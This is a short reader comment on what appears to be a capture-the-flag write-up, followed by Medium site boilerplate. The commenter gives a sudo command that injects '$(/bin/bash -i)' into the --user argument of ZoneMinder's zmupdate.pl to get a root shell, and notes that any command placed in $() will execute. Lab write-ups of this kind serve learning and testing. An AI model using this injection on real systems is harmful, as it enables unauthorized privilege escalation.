I just solved the box using following command:

"sudo /usr/bin/zmupdate.pl --version=1 --user='$(/bin/bash -i)' --pass=ZoneMinderPassword2023".

This command directly spawn a shell with root privileges, providing a simpler and cleaner method for privilege escalation.

The key aspect of this vulnerability is you can insert any command within the $() variable and the binary will execute it. This information should be included in your post to clarify for readers that the solution is not limited to executing a reverse shell using busybox.

However, great post. Keep up the good work.

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Delbert Giovanni Lie
Delbert Giovanni Lie

Responses (1)

Write a response